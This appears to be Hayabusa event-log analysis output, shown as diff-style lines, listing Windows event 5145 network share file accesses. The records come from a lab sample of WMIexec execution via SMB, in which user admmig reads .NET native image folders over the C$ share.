+2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8#\02acbf854b27f2d83aa9eec6e1f6135a  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b#\69e2093b3cec29bdd3c9fbba83990dfe  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0#\dd2dddd8e337402ac96330a8d24120d6  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp\3df09428e1087ca282100efc481a9947  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83#\93e744bcb19dc3206bfff080448a94e1  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.654 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235#\8b051a98022e8b354053e87e1dcaf2f0  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420#\88eec28a11e76fffbecf3de79cadf076  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2#\d75626a8ff89596aee2cf2c9eb554cbf  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90#\62095b976d2affb993898b2e9f88c475  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a#\f39c57237f98d69b4abdc9e3907d8fe7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479#\9fd6e8c8110ccd01fd6745507b906c04  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b#\ec2e3c1e16b1d1427b32d2f2babf99bc  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084#\a9175ff6a1a8784975c70e9933314ecd  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5#\c7ef2b5b5fc4335bef3148904cb3f0e5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a#\a5c640ad1645775e93d560f67f3ea1d1  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e#\865873dc1b8af370b7a314c3c89dcfd0  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168#\9d5a241e9cf3bdb8312058004ea269f4  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\68828aa1ea98316a22a4d8488267b07b  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b#\7cb1fc2895121ae7e24841bd0c24b25e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656#\e1349161320cee221fb339c41ab73546  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83#\59420f153f7bb0ef6f63e75d08020c8c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\433ad5082c48708eb6acf6fa065c1461  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5#\87b325b56b362a5d2dca93029c0d75b8  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786#\8078dc8e65f16bfd95c09cce4fe0280e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611#\54330dabd4f5e29c758461cbbf2a4f34  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1#\50399e243bf8da1addc23305521efbd9  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#\174cd66357bfa0b262b0dbd9bd0e64e3  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce#\f05e09fe4c0d9354867afe11b4e9db8c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
